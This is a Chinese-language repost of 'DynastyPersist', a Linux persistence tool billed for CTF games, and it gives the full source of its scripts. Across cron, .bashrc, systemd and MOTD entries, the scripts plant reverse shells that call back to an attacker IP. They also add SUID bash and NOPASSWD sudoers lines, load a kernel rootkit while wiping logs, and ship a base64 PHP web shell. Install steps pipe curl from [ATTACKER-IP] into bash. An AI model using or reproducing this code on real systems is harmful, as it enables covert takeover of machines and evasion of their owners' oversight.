DynastyPersist Linux持久化控制工具

DynastyPersist Linux持久化控制工具

DynastyPersist简介

  • 用于Linux持久性的CTF工具(KOTH、Battlegrounds)
  • 一个强大且有用的 Linux 持久性脚本,专为各种评估和测试场景而设计。该安全脚本提供了一系列功能,演示了在 Linux 系统上实现持久性的不同方法。

特征

  1. SSH密钥生成:自动生成用于秘密访问的SSH密钥。
  2. Cronjob Persistence:设置cronjobs以实现计划的持久性。
  3. 具有root权限的自定义用户:创建具有root权限的自定义用户。
  4. RCE持久化:通过远程代码执行(php webshel​​​​l)实现持久化。
  5. LKM/Rootkit:演示基于Linux内核模块(LKM)的Rootkit持久性。
  6. Bashrc持久性:修改用户特定的shell初始化文件以实现持久性。
  7. Systemd Service for Root:设置systemd服务以实现root持久化。
  8. LD_PRELOAD权限提升配置:配置LD_PRELOAD以进行权限提升。
  9. 每日后门消息/标题:后门系统消息显示用于秘密访问。
  10. 修改现有 Systemd 服务:操作现有 systemd 服务以实现持久性。

安装

  1. 存储库克隆到您的本地计算机:
$ git clone https://github.com/Trevohack/DynastyPersist.git

$ python3 -m http.server 8080 
[email protected] # cd /opt && wget -c [ATTACKER-IP]:8080/DynastyPersist && cd DynastyPersist && chmod +x dynasty.sh && ./dynasty.sh

一把梭:

curl -sSL [ATTACKER-IP]8080/DynastyPersist/dynasty.sh | bash
DynastyPersist Linux持久化控制工具

下载地址

github.com/Trevohack/DynastyPersist

dynasty.sh源码

#!/bin/bash

################################################ 
#                                              # 
#             Title: Dynasty Persist           # 
#        Author: Trevohack                     # 
#        Date: 1.8.2023                        # 
#        Version: 1.0                          # 
#                                              # 
################################################ 


ip="$1"
port="$2"

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
WHITE='\033[0;37m'
RESET='\033[0m'


newUser() {
    echo -e "\033[0;32m[+] - New User Config " && echo -e "\n"
    echo -e "\033[0;32m[+] - Enter a name for the new user: "
    read Newuser 
    adduser $Newuser 
    usermod -aG sudo $Newuser 
    chmod u+s /bin/bash
}


sshConfig() {
    for user_dir in /home/*; do
        if [[ -d "$user_dir" && ! -L "$user_dir" && "$(basename "$user_dir")" != "lost+found" ]]; then
        username=$(basename "$user_dir")
            if [[ ! -f "$user_dir/.ssh/id_rsa" && ! -f "$user_dir/.ssh/id_rsa.pub" ]]; then
                echo "Generating SSH keys for user: $username"
                sudo -u "$username" ssh-keygen -t rsa -b 4096 -N "" -f "$user_dir/.ssh/id_rsa"
            else
                echo "SSH keys already exist for user: $username"
            fi
        fi
    done 
    echo -e "\033[0;32m[+] - SSH key generation complete."

}


ServiceOnSystemd() {
    echo -e "\033[0;32m[+] - Systemd Root Service setting up ...\n"
    echo "Enter the full path of the script: "
    read scrip
    echo "Enter the command to run: "
    read exec 
    if [ -z "$script" ]; then
        script="exec.sh"
    fi
    if [ -z "$exec" ]; then
        exec="sudo bash"
    fi
    local CONFIG_CONTENT="[Unit]
Description=Dynasty Persist

[Service]
ExecStart=${exec} ${script}
Restart=always
RestartSec=30

[Install]
WantedBy=default.target"

    echo "$CONFIG_CONTENT" | sudo tee /etc/systemd/system/rshell.service > /dev/null 

    systemctl daemon-reload
    systemctl enable rshell.service 
    systemctl start rshell.service 

    echo -e "\033[0;32m[+] - Systemd Root Level Service successfully configued!"
}

ModServiceOnSystemd() {
    echo -e "\033[0;32m[+] - Modify Systemd Service for Persistence"
    read -p "Enter the location of the service: " loca
    sed -i "/^ExecStart=/c\ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'" "$loca"
    if grep -q "ExecStartPre" "$service_file"; then
        sed -i "s/^ExecStartPre=.*/ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'" "$loca"
        echo "ExecStartPre present! ExecStartPre was modified!\n\n"
    else
        echo "No ExecStartPre present! ExecStart was modified!\n\n"
    fi
    echo -e "\033[0;32m[+] - Modified Root level setup successfully!"
}

cronjobs() {
    echo -e "\033[0;32m[+] - Setting up cronjobs for persistence ... " && echo -e "\n"
    comandx="/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'"
    command2="/usr/bin/python -c \"import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$ip\\\",$port));subprocess.call(['/bin/sh','-i'],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\""
    command3="/usr/bin/python3 -c \"import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$ip\\\",$port));subprocess.call(['/bin/sh','-i'],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\""    echo "* * * * * root $comandx" | sudo tee -a /etc/crontab 
    echo "* * * * * root $comandx" | sudo tee -a /etc/crontab 
    echo "* * * * * root $command2" | sudo tee -a /etc/crontab 
    echo -e "\033[0;32m[+] - Cronjobs successfully started."
}

bashrc() {
    echo -e "\033[0;32m[+] - Configuring ~/.bashrc for persistence ... " && echo -e "\n"
    command0="/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'"
    command="nc -e /bin/sh $ip $port"
    for user in /home/*; do
        if [ -d "$user" ]; then
          echo "$command" >> "$user/.bashrc"
          echo "$command0" >> "$user/.bashrc"
        fi
    echo "$command0" >> "/root/.bashrc"
    echo "$command" >> "/root/.bashrc"
    done
    echo -e "\033[0;32m[+] - Bashrc persistence added!"
}

configDiamorphine() {
    echo -e "\033[0;32m[+] - Rootkit Configuration"
    mkdir -p /var/tmp/.memory
    git clone https://github.com/m0nad/Diamorphine /var/tmp/.memory
    mv /var/tmp/.memory/diamorphine.c /var/tmp/.memory/root.c 
    mv /var/tmp/.memory/diamorphine.h /var/tmp/.memory/root.h
    sed -i 's/diamorphine_secret/dynasty/g' /var/tmp/.memory/root.h
    sed -i 's/diamorphine/dynasty/g' /var/tmp/.memory/root.h
    make -C /var/tmp/.memory
    sed -i 's/diamorphine.h/root.h/g' /var/tmp/.memory/root.c
    sed -i 's/diamorphine_init/root_init/g' /var/tmp/.memory/root.c 
    sed -i 's/diamorphine_cleanup/root_clean/g' /var/tmp/.memory/root.c
    sed -i 's/diamorphine.o/root.o/g' /var/tmp/.memory/Makefile
    insmod /var/tmp/.memory/root.ko
    make clean -C /var/tmp/.memory
    rm -rf /var/tmp/.memory
    dmesg -C 
    echo "Nothing to see here ... " > /var/log/kern.log
    echo -e "\033[0;32m[+] - Rootkit configured successfully"
}

LDPreloadPrivesc() {
    chmod +x preload.sh
    ./preload.sh
}

rcePersistence() {
    PORT=9056 
    mkdir /var/www/html/dynasty_rce 
    cp rce.php /var/www/dynasty_rce/rce.php 
    cd /var/www/html/dynasty_rce 
    php -S 0.0.0.0:$PORT & 
}

MessageOfTheDay() {
    echo -e "\033[0;32m[+] - Linux header / Message Of The Day Persistence"
    read -p "Enter your python location? " pythonv
    echo "bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'" >> /etc/update-motd.d/00-header 
    echo "nc -e /bin/sh $ip $port" >> /etc/update-motd.d/00-header 
    echo "$pythonv -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'' >> /etc/update-motd.d/00-header"
    echo -e "\033[0;32m[+] - Success!"
}

help() {
    echo -e "\e[1m
        ──────────────────────────────────────────────────
            \e[96mD Y N A S T Y  - P E R S I S T\e[0m
        ──────────────────────────────────────────────────

        \e[93m1. Basrc Persistence:\e[0m
        Maintain persistence: When a user authenticates.

        \e[93m2. Cronjob Persistence:\e[0m
        Schedule tasks for persistence.

        \e[93m3. Custom User with Root:\e[0m
        Create a root privileged user account.

        \e[93m4. RCE Persistence:\e[0m
        Remote Code Execution capabilities through a web server.

        \e[93m5. Custom LKM/Rootkit:\e[0m
        Implement custom kernel modules or rootkits / Diamorphine.

        \e[93m6. SSH Key Generation:\e[0m
        Generate SSH keys for secure authentication for every user.

        \e[93m7. Systemd Service for Root:\e[0m
        Configure root-level service for persistence.

        \e[93m7. LD_PRELOAD Privilege Escalation:\e[0m
        Special Thanks to @MatheuzSec for this.

        \e[93m7. Backdooring Message Of The Day / Linux Header:\e[0m
        Backdoor the Linux header on 00-header on the update-motd framework

        \e[93m7 Modify A Systemd Service for Persistence:\e[0m
        Modify a present systemd service for a reverse shell / persistence 

        ───────────────────DYNASTY───────────────────\e[0m"


}

main() {
    echo -e "${MAGENTA}  _             _                   
        | \    ._   _.  _ _|_     |_) _  ._ _ o  _ _|_ 
        |_/ \/ | | (_| _>  |_ \/  |  (/_ | _> | _>  |_ 
            /                 /                        
            "
    text="Made by: @Trevohack | @opabravo | @matheuz"
    delay="0.1"

    for ((i = 0; i < ${#text}; i++)); do
        echo -n "${text:$i:1}"
        sleep "$delay"
    done
    echo

    echo -e " 
       1. SSH Key Generation          4. RCE Persistence 
       2. Cronjob Persistence         5. LKM/Rootkit
       3. Custom User with Root       6. Bashrc Persistence 
       7. Systemd Service for Root    8. LD_PRELOAD Privilege Escalaion Config
       9. Backdooring Message of the Day / Header 
       10. Modify An Existing Systemd Service 
       
       help for more information! 
       "
       read -p "[-{DYNASTY-P3R1ST}-] " input
       if [ "$input" == "1" ]; then
           sshConfig
       elif [ "$input" == "2" ]; then
           cronjobs
       elif [ "$input" == "3" ]; then
           newUser
       elif [ "$input" == "4" ]; then
            rcePersistence
       elif [ "$input" == "5" ]; then
           configDiamorphine
       elif [ "$input" == "6" ]; then
           bashrc 
       elif [ "$input" == "8" ]; then
           LDPreloadPrivesc 
       elif [ "$input" == "9" ]; then
           MessageOfTheDay
       elif  [ "$input" == "10" ]; then
           ModServiceOnSystemd 
       elif [ "$input" == "help" ] || [ input == "h" ]; then
           help 
       else 
           echo -e "${RED}[ERROR] Invalid command"
        fi
}
clear 
main

exec.sh源码


#!/bin/bash


/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'
python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",$port));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
python3 -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",$port));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'

preload.sh源码




# Author: MatheuzSec 
# Modified by: Trevohack aka "SpaceShuttleIO"



#!/bin/bash

addPreloadToPrivesc() {
	echo "Defaults    env_keep += LD_PRELOAD" >> /etc/sudoers
}

addUser() {
	read -p "Enter with user or www-data: " user 
	echo "$user ALL=(ALL:ALL) NOPASSWD: /usr/bin/find" >> /etc/sudoers
    echo "$user ALL=(ALL:ALL) NOPASSWD: /usr/bin/wget" >> /etc/sudoers

}

addPreloadToPrivesc && addUser /


echo "[+] Success! LD_PRELOAD has been added!"

rce.php源码

<!DOCTYPE html>
<html>
<head>
    <title>Dynasty Persist</title>
</head>
<body>
    <script>
    window.onload = function() {
        document.getElementById('execute_form').onsubmit = function () {
            var command = document.getElementById('cmd');
            command.value = window.btoa(command.value);
        };
    };
    </script>
    <form id="execute_form" autocomplete="off" method="get">
        <b>Command</b><input type="text" name="id" id="cmd" autofocus="autofocus" style="width: 500px" />
        <input type="submit" value="Execute" />
    </form>
    <?php
    if (isset($_GET['id'])) {
        $decoded_command = base64_decode($_GET['id']);
        echo "<b>Executed:</b>  $decoded_command<br><br>";
        
        exec($decoded_command . " 2>&1", $output, $return_status);
        
        if ($return_status !== 0) {
            echo "<font color='red'>Error in Code Execution -->  </font>";
        } else {
            echo "<b>Output:</b><br>";
        }
        
        foreach ($output as $line) {
            echo htmlspecialchars($line) . "<br>";
        }
    }
    ?>
</body>
</html>

命令参数

  _             _                   
        | \    ._   _.  _ _|_     |_) _  ._ _ o  _ _|_ 
        |_/ \/ | | (_| _>  |_ \/  |  (/_ | _> | _>  |_ 
            /                 /                        
            
Made by: @Trevohack | @opabravo | @matheuz
 
       1. SSH Key Generation          4. RCE Persistence 
       2. Cronjob Persistence         5. LKM/Rootkit
       3. Custom User with Root       6. Bashrc Persistence 
       7. Systemd Service for Root    8. LD_PRELOAD Privilege Escalaion Config
       9. Backdooring Message of the Day / Header 
       10. Modify An Existing Systemd Service 
       
       help for more information! 
       
[-{DYNASTY-P3R1ST}-] 

转载请注明出处及链接

Leave a Reply

您的电子邮箱地址不会被公开。 必填项已用*标注